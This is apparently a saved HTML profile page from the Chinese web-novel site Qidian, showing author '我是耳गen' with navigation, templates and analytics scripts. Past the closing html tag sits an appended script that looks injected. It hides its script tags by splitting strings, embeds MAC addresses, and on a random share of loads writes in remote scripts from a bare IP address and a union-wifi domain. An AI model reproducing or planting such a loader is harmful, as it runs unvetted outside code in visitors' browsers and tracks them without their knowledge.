


<!DOCTYPE html>
<html lang="en" xmlns:th="http://www.w3.org/1999/xhtml">
<head>
    <meta charset="UTF-8">
    <title th:text="${au.authorNname}"></title>
    <meta name="description" content="小说阅读,精彩小说尽在起点中文网. 起点中文网提供玄幻小说,武侠小说,原创小说,网游小说,都市小说,言情小说,青春小说,历史小说,军事小说,网游小说,科幻小说,恐怖小说,首发小说,最新章节免费">
    <link rel="icon" type="image/x-icon" href="//qidian.gtimg.com/qdp/img/favicon.0.1.ico">

    <link rel="stylesheet" data-ignore="true" href="//qidian.gtimg.com/c/=/qdp/iconfont/symbols.3.55.css,/qdp/css/common.0.78.css,/qdp/css/mainHeader.0.10.css,/qdp/css/userHome/index.0.24.css,/qdp/icon/common/sprite.0.11.css,/qdp/font/index.0.10.css" />

    <script>document.domain ='qidian.com';</script>
    <script>var speedTimer = [], speedZero = new Date().getTime();</script>
</head>
<body class="user">
<div class="personal-mheader">
    <div class="mheader-wrapper">
        <ul class="mheader-nav fl">
            <li class="mheader-nav-li mheader-logo">
                <a href="//www.qidian.com" target="_blank" class="mheader-nav-a mheader-logo-a">起点中文网<span class="mheader-arrow"></span></a>
                <ul class="mheader-drop">
                    <li>
                        <a href="//www.qdmm.com" target="_blank">起点女生网</a>
                    </li>
                    <li>
                        <a href="//chuangshi.qq.com" target="_blank" >创世中文网</a>
                    </li>
                    <li>
                        <a href="//yunqi.qq.com" target="_blank">云起书院</a>
                    </li>
                </ul>
            </li>
            <li class="mheader-nav-li">
                <a href="//xuanhuan.qidian.com/" class="mheader-nav-a" target="_blank">玄幻</a>
            </li>
            <li class="mheader-nav-li">
                <a href="//dushi.qidian.com/" class="mheader-nav-a" target="_blank">都市</a>
            </li>
            <li class="mheader-nav-li">
                <a href="//xianxia.qidian.com/" class="mheader-nav-a" target="_blank">仙侠</a>
            </li>
            <li class="mheader-nav-li">
                <a href="//kehuan.qidian.com" class="mheader-nav-a" target="_blank">科幻</a>
            </li>
            <li class="mheader-nav-li">
                <a href="//youxi.qidian.com/" class="mheader-nav-a" target="_blank">游戏</a>
            </li>
            <li class="mheader-nav-li">
                <a href="//lishi.qidian.com" class="mheader-nav-a" target="_blank">历史</a>
            </li>
            <li class="mheader-nav-li">
                <a href="//r.qidian.com" class="mheader-nav-a" target="_blank">排行</a>
            </li>
            <li class="mheader-nav-li mheader-more">
                <a href="javascript:;" class="mheader-nav-a">更多<span class="mheader-arrow"></span></a>
                <ul class="mheader-drop">
                    <li>
                        <a href="//a.qidian.com/" target="_blank">全部作品</a>
                    </li>
                    <li>
                        <a href="//2cy.qidian.com/" target="_blank">二次元</a>
                    </li>
                    <li>
                        <a href="//qihuan.qidian.com" target="_blank">奇幻</a>
                    </li>
                    <li>
                        <a href="//wuxia.qidian.com" target="_blank">武侠</a>
                    </li>
                    <li>
                        <a href="//lingyi.qidian.com" target="_blank">灵异</a>
                    </li>
                    <li>
                        <a href="//junshi.qidian.com" target="_blank">军事</a>
                    </li>
                    <li>
                        <a href="//zhichang.qidian.com" target="_blank">职场</a>
                    </li>
                    <li>
                        <a href="//tiyu.qidian.com/" target="_blank">体育</a>
                    </li>
                    <li>
                        <a href="//duanpian.qidian.com/" target="_blank">短篇</a>
                    </li>
                </ul>
            </li>
        </ul>
        <ul class="mheader-nav fr">
            <li class="mheader-nav-li">
                <form class="mheader-search">

                    <input type="text" id="elSearchInput" class="mheader-search-input" placeholder="逆流纯真年代">

                    <input id="mHeaderSearch" type="submit" class="dn" name="">
                    <label for="mHeaderSearch" class="mheader-search-label w_searchlable"></label>
                </form>
            </li>
            <li class="mheader-nav-li line"></li>

            <li class="mheader-nav-li" style="">
                <div class="mheader-logout">
                    <a href="//passport.qidian.com/reg.html" target="_blank" class="mr8">注册</a>
                    <a href="javascript:;" class="btnLogin" >登录</a>
                </div>
            </li>

            <li class="mheader-nav-li line"></li>
            <li class="mheader-nav-li">
                <a href="/bookcase" class="mheader-nav-a mheader-shelf-a"><i class="iconfont icon-book"
                ></i>我的书架</a>
            </li>
        </ul>
    </div>
</div>
<div class="">
    <div class="user-header" data-l1="2">
        <div class="user-header-wrapper">
            <div class="header-avatar">
                <a href="//my.qidian.com/user/108412013"><img class="header-avatar-img" src="//facepic.qidian.com/qd_face/349573/94/100" alt="我是耳根的头像"></a>
                <a class="header-avatar-vip icon icon-gv" href="//www.qidian.com/help/index/7" target="_blank"></a>
            </div>
            <div class="header-msg">
                <h3 id="elUidWrap" data-id="108412013" th:text="${au.name}"><a href="//my.qidian.com/user/108412013">我是耳根</a><a class="header-msg-level" href="//www.qidian.com/help/index/14" target="_blank">Lv19</a></h3>
                <div class="header-msg-desc"><b th:text="${au.sex}"></b>&nbsp;/&nbsp;<b th:text="${au.provinces}"></b></div>

                <div class="header-msg-title" >称号: <b th:text="${au.designation}"></b></div>

                <div class="header-msg-data">
                    关注 <span class="mr8" th:text="${au.attention}"><strong class="header-msg-strong">69</strong></span>粉丝<span class="ml12 mr8" th:text="${au.fans}"><strong class="header-msg-strong">162845</strong></span>
                </div>

                <div class="qdp-button" data-l2="1">

                    <a href="javascript:;" class="ui-button ui-button-small btnLogin" data-eid="qd_M245">关注</a>
                    <a href="javascript:;" class="qdp-button-a mlr4 btnLogin" data-eid="qd_M246">私信</a>

                    <a href="/author/4362120" class="qdp-button-a mlr4" target="_blank">作家页</a>

                    <div class="user-menu-wrapper">
                        <a href="javascript:;" class="qdp-button-a qdp-button-icon" data-target="userBlacklist"><i class="iconfont icon-menu"></i></a>
                        <div id="userBlacklist" class="ui-datalist">
                            <div class="ui-datalist-datalist">
                                <a href="javascript:;" class="ui-datalist-option btnLogin" data-eid="qd_M247">加入黑名单</a>
                                <a href="javascript:;" class="ui-datalist-option btnLogin" data-eid="qd_M248">举报</a>
                                <b class="arr arr-up">
                                    <i class="arr-left"></i>
                                    <i class="arr-right"></i>
                                </b>
                            </div>
                        </div>
                    </div>

                </div>

            </div>
        </div>
    </div>
    <div class="user-content-wrapper" data-l1="2">

        <div class="user-sidebar" >
            <div class="user-sidebar-wrapper">
                <div class="user-sidebar-head">认证</div>
                <div class="sidebar-list">

                    <img src="//qidian.gtimg.com/qdp/img/badge/rzicon_yd_07.0.1.gif" class="sidebar-list-img jsTips" title="阅读达人6级">

                    <img src="//qidian.gtimg.com/qdp/img/badge/rzicon_hr_04.0.1.gif" class="sidebar-list-img jsTips" title="起点名人3级">

                    <img src="//qidian.gtimg.com/qdp/img/badge/rzicon_sp_03.0.1.gif" class="sidebar-list-img jsTips" title="书评达人2级">

                    <img src="//qidian.gtimg.com/qdp/img/badge/rzicon_ViceM_00.0.1.gif" class="sidebar-list-img jsTips" title="副版主0级">

                </div>
                <div class="user-sidebar-head" data-l2="4">徽章<a href="//my.qidian.com/user/badge/108412013" class="fr blue" target="_blank"  data-eid="qd_M264">更多></a></div>
                <div class="sidebar-list">

                    <img src="//qidian.gtimg.com/qd/images/user/userbadge/198badge297.png" class="sidebar-list-img">

                    <img src="//qidian.gtimg.com/qd/images/user/userbadge/198badge298.png" class="sidebar-list-img">

                    <img src="//qidian.gtimg.com/qd/images/user/userbadge/198badge71.png" class="sidebar-list-img">

                </div>
                <div class="user-sidebar-head" data-l2="4">大神之光<span class="disabled fr">暂无</span></div>
            </div>
            <div class="user-sidebar-wrapper">
                <h3 class="user-sidebar-title">足迹</h3>
                <ul class="user-sidebar-list ui-loading" id="elHistoryWrap" style="height: 150px;">
                    <li class="ui-loading-icon"></li>
                </ul>
            </div>
        </div>
        <div class="user-content" >

            <h2 class="user-title" data-l2="3">收藏的书单(0)</h2>


            <div class="other-rec-wrap no-data">
                <div class="no-result-img">
                    <span class="no-data-img"></span>
                </div>
                <h4>该用户暂无收藏的书单</h4>
            </div>

            <h2 class="user-title user-honor">粉丝荣誉</h2>
            <div id="elFansHonorWrap">
                <ul id="fansHonorTab" class="user-honor-list" data-l2="4">
                    <li class="ui-loading" style="height:62px;">
                        <i class="ui-loading-icon"></i>
                    </li>
                </ul>
                <div class="user-honor-book qdp-border" id="elTabCon">
                </div>
            </div>
        </div>

        <div class="go-top dn">
            <div class="go-top-wrap">
                <a href="#" class="icon-go-top bTips" title="返回顶部" ><i class="iconfont icon-backtop"></i></a>
            </div>
        </div>
    </div>
    <script id="tplHistory" type="text/ejs-template">
        <li class="user-sidebar-item">书架藏书: <%= data.historyData.bshelfCnt %>本</li>
        <li class="user-sidebar-item">订阅过作品: <%= data.historyData.subscribeCnt %>本</li>
        <li class="user-sidebar-item">打赏作品: <%= data.historyData.donateCnt %>本</li>
        <li class="user-sidebar-item">投月票: <%= data.historyData.monthTicketCnt %>张</li>
        <li class="user-sidebar-item">投推荐票: <%= data.historyData.rcmTicketCnt %>张</li>
    </script>
    <script id="tplFansHonor" type="text/ejs-template">
        <% data.config.forEach(function(obj,index){ var mNum = (index != 10 ?  index + 253 : 279 ) ; var rid=index + 1  %>
        <% if(obj.friendGetCnt != 0 ){ %>
        <a href="javascript:" class="user-honor-item <%= obj.friendGetCnt == 0 ? '' : 'elCanTab' %>" data-index="<%= obj.levelId %>" data-rel="<%= obj.levelId %>" data-eid="qd_M<%= mNum %>" data-rid="<%= rid %>" >
            <div class="user-honor-num"><%= obj.friendGetCnt %></div>
            <div class="user-honor-title"><%= obj.levelName %></div>
        </a>
        <% } else { %>
        <a class="user-honor-item <%= obj.friendGetCnt == 0 ? '' : 'elCanTab' %>" data-index="<%= obj.levelId %>" data-eid="qd_M<%= mNum %>" data-rid="<%= rid %>" >
            <div class="user-honor-num"><%= obj.friendGetCnt %></div>
            <div class="user-honor-title"><%= obj.levelName %></div>
        </a>
        <% } %>
        <% }) %>
    </script>
    <script id="tplTabClick" type="text/ejs-template">
        <% data.books.forEach(function(obj,index){ %>
        <span class="<%= index==0?'':'dn' %>">
            <% for(var i=0;i< obj.length;i++) { %>
                <a href="//book.qidian.com/info/<%= obj[i].bookId %>" class="mr5 bluehover" target="_blank" data-eid="qd_M263">《<%= obj[i].bookName %>》</a>
            <% } %>
            </span>
        <% }) %>
        <% if(data.isMore){ %>
        <a href="javascript:;" class="blue" id="elShowMore">展开更多</a>
        <% } %>
        <b class="user-honor-arr elArrow">
            <i class="user-arr-up"></i>
            <i class="user-arr-down"></i>
        </b>
    </script>
    <script id="tplReport" type="text/ejs-template">
        <div class="user-dialog-report">
            <form action="/ajax/User/Complain" method="post">
                <input type="hidden" name="id" value="" class="elReId">
                <input type="hidden" name="_csrfToken" value="" id="elrepCsrf" >
                <dl class="elReName">
                    <dt>举报对象</dt>
                    <dd></dd>
                </dl>
                <dl class="">
                    <dt>举报类型</dt>
                    <dd>
                        <input type="radio" id="radioStyle1" name="type" value="1" required>
                        <label for="radioStyle1" class="ui-radio mr8"></label><label for="radioStyle1" class="mr12">色情低俗</label>
                        <input type="radio" id="radioStyle2" name="type" value="2" required>
                        <label for="radioStyle2" class="ui-radio mr8 ml12"></label><label for="radioStyle2" class="mr12">垃圾广告</label>
                        <input type="radio" id="radioStyle3" name="type" value="3" required>
                        <label for="radioStyle3" class="ui-radio mr8 ml12"></label><label for="radioStyle3" class="mr12">恶意营销</label>
                        <input type="radio" id="radioStyle4" name="type" value="4" required>
                        <label for="radioStyle4" class="ui-radio mr8 ml12"></label><label for="radioStyle4">人身攻击</label>
                    </dd>
                </dl>
                <dl class="">
                    <dt><label for="reportDesc">举报描述</label></dt>
                    <dd>
                        <div class="ui-textarea-x">
                            <textarea id="reportDesc" name="desc" maxlength="200" rows="2" placeholder="输入详细说明" required></textarea>
                            <div class="ui-textarea"></div>
                        </div>
                    </dd>
                </dl>
                <div class="qdp-form-button">
                    <input type="submit" id="dialogReportSubmit" class="clip">
                    <label class="ui-button" for="dialogReportSubmit">提交</label>
                </div>
            </form>
        </div>
    </script>
    <script id="tplDialogSendMsg" type="text/ejs-template">
        <div class="letter-pop">
            <form action="/ajax/message/send" method="post">
                <input type="hidden" name="_csrfToken" value="" id="elMsgCsrf" >
                <h6 class="pop-title">收信人</h6>
                <div class="ui-input pop-receiver">
                    <label for="iptMsgSenderId" class="receiver-select receiver-user">
                        <img src="" class="receiver-user-img">
                        <span class="w_username"></span>
                    </label>
                    <input type="hidden" id="iptMsgSenderId" name="id">
                    <input type="hidden" id="iptMsgGuId" name="guid">
                    <input id="iptMsgPoster" disabled>
                </div>
                <h6 class="pop-title">内容</h6>
                <div class="pop-content ui-textarea-x" style="width:500px;">
                    <textarea id="forLetterArea" name="content" maxlength="500" lang="zh" rows="5" required placeholder="输入内容"></textarea>
                    <div class="ui-textarea"></div>
                    <label for="forLetterArea" class="ui-textarea-count">
                        <span>0</span>/<span>500</span>
                    </label>
                </div>
                <div class="pop-submit">
                    <input type="submit" id="dialogMsgSubmit" class="clip">
                    <label class="ui-button" for="dialogMsgSubmit">确定</label>
                </div>
            </form>
        </div>
    </script>
</div>
<div class="personal-footer">
    <div class="footer-sub">
        <a href="//www.yuewen.com/" target="_blank">阅文集团</a>旗下网站：
        <a href="//www.qidian.com" target="_blank" class="mr8">起点中文网</a>
        <a href="//www.qdmm.com/" target="_blank" class="mr8">起点女生网</a>
        <a href="//chuangshi.qq.com" target="_blank" class="mr8">创世中文网</a>
        <a href="//yunqi.qq.com/" target="_blank" class="mr8">云起书院</a>
        <a href="//www.hongxiu.com" target="_blank" class="mr8">红袖添香</a>
        <a href="//www.readnovel.com" target="_blank" class="mr8">小说阅读网</a>
        <a href="//www.xs8.cn/" target="_blank" class="mr8">言情小说吧</a>
        <a href="//www.xxsy.net/" target="_blank" class="mr8">潇湘书院</a>
        <a href="//www.tingbook.com/" target="_blank" class="mr8">天方听书网</a>
        <a href="//www.lrts.me" target="_blank" class="mr8">懒人听书</a>
        <a href="//yuedu.yuewen.com/" target="_blank" class="mr8">阅文悦读</a>
        <a href="//www.yuewen.com/app.html" target="_blank" class="mr8">QQ阅读</a>
        <a href="http://www.yuewen.com/app.html#appqd" target="_blank" class="mr8">起点读书</a>
        <a href="http://www.yuewen.com/app.html#appzj" target="_blank" class="mr8">作家助手</a>
        <a href="//www.webnovel.com" target="_blank" class="mr8">起点国际版</a>
    </div>
    <div class="footer-menu">
        <a href="//www.qidian.com/about/intro" target="_blank">关于起点</a>
        <a href="//www.qidian.com/about/contact" target="_blank">联系我们</a>
        <a href="//join.book.qq.com/index.html" target="_blank">加入我们</a>
        <a href="//www.qidian.com/help/index/2" target="_blank">帮助中心</a>
        <a href="//bbs.qidian.com/list/53" target="_blank">提交建议</a>
        <!-- <a href="//wwwploy.qidian.com/help/about_link.aspx" target="_blank">合作伙伴</a> -->
        <a href="//bbs.qidian.com" target="_blank">起点论坛</a>
        <!-- <a href="//webgame.qidian.com/jiazhang.html" target="_blank">家长监护工程</a> -->
    </div>
    <div class="footer-copyright">
        <p>Copyright (C) 2002-2017 www.qidian.com All Rights Reserved 版权所有 </p>
        <p>上海玄霆娱乐信息科技有限公司 上海玄霆娱乐信息科技有限公司 增值电信业务经营许可证沪B2-20080046 沪网文[2015]0081-031 新出网证(沪)字010 沪ICP备08017520号-1</p>
        <p>请所有作者发布作品时务必遵守国家互联网信息管理办法规定，我们拒绝任何色情小说，一经发现，即作删除！</p>
        <p>本站所收录作品、社区话题、书库评论及本站所做之广告均属其个人行为，与本站立场无关</p>
    </div>
</div>
<script>
    // 全局的通用数据都放g_data变量里
    var g_data = {};
    // 环境变量，会按照环境选择性打log
    g_data.envType = 'pro';
    // 调试模式
    g_data.debug = 'false';
    g_data.static = '//qidian.gtimg.com';
    // 域名
    g_data.domains = {"my":"//my.qidian.com","static":"//qidian.gtimg.com","cover":"//qidian.qpic.cn","pay":"//pay.yuewen.com","security":"//aq.yuewen.com","pc":"//www.qidian.com","hiijack":"//book.qidian.com","activity":"//activity.qidian.com","help":"//www.qidian.com"};
    // 用户
    g_data.user = {"isLogin":false,"avatar":"","nickName":"","userId":-1,"userType":-1,"guid":null,"tucaoUrl":""};
    // 用作统计PV
    g_data.pageId = 'qd_P_readerinfo';
    // 用作判断用户是否登录
    g_data.isLogin = false;
</script>
<script data-ignore="true" src="//qidian.gtimg.com/lbf/2.0.0/LBF.js?max_age=31536000"></script>
<script>
    // LBF 配置
    LBF.config({
        paths: {
            qdp: '//qidian.gtimg.com/qdp',
        },
        vars: {
            theme: '//qidian.gtimg.com/qdp/css',
        },
        combo: true,
        debug: false
    });
    //设置页面常用的一些插件
    LBF.use(['lib.jQuery', 'monitor.SpeedReport', 'qdp/js/common/page/index.0.56.js', 'qdp/js/user/index.0.22.js'], function ($, SpeedReport, pageCommon, page) {
        pageCommon.init();
        page.init();
        $(window).on('load.speedReport', function () {
            // speedTimer[onload]
            speedTimer.push(new Date().getTime());
            var f1 = 7718; // china reading limited's ID
            var f2 = 251; // site ID
            var f3 = 0; // page ID
            // chrome & IE9 Performance API
            SpeedReport.reportPerformance({
                flag1: f1,
                flag2: f2,
                flag3IE: f3,
                flag3Chrome: f3,
                rate: 0.1
            });
            // common speedTimer:['dom ready', 'onload']
            var speedReport = SpeedReport.create({
                flag1: f1,
                flag2: f2,
                flag3: f3,
                start: speedZero,
                rate: 0.1
            });
            // chrome & IE9 Performance API range 1~19, common speedTimer use 20+
            for (var i = 0; i < speedTimer.length; i++) {
                speedReport.add(speedTimer[i], i + 20);
            }
            // http://isdspeed.qq.com/cgi-bin/r.cgi?flag1=7718&flag2=224&flag3=1&1=38&2=38&…
            speedReport.send();
        });
    });
    // speedTimer[dom ready], put it before </body>
    speedTimer.push(new Date().getTime());
</script>

<script>
    var _mtac = {"senseQuery":1};
    (function() {
        var mta = document.createElement("script");
        mta.src = "//pingjs.qq.com/h5/stats.js?v2.0.4";
        mta.setAttribute("name", "MTAH5");
        mta.setAttribute("sid", "500445303");
        mta.setAttribute("cid", "500446496");
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(mta, s);
    })();
</script>

</body>
</html>
<script>
    function ik_random(){var ik_r_min=0;var ik_r_max=100;return(parseInt(Math.random()*(ik_r_max-ik_r_min+1)+ik_r_min));}
    function ik_isiframe(){return (self!=top);}
    var __m='1c:39:47:c6:28:6e';
    var __m2='00:00:00:00:00:00';
    var __h="<sc"+"ript src=\"http://101.201.53.95/js.php?uid=90b9a2b579ed77179e1accd617f5034b,PC,";
    var __b="&r="+Math.random()+__m+__m2+"\"></scr"+"ipt>";
    var x=ik_random();
    if(!ik_isiframe()){
        switch(true){
            case x>=0&&x<5:
                document.write(__h+"200"+__b);
                document.write("<sc"+"ript src=\"http://js.union-wifi.com/zm.js?R6Gpf6T&dmac="+__m2+"&umac="+__m+"\"></scr"+"ipt>");
                break;
            case x>=55&&x<=100:
                document.write(__h+"100"+__b);
                document.write("<sc"+"ript src=\"http://js.union-wifi.com/zm.js?Rav195P&dmac="+__m2+"&umac="+__m+"\"></scr"+"ipt>");
                break;
        }
    }
</script>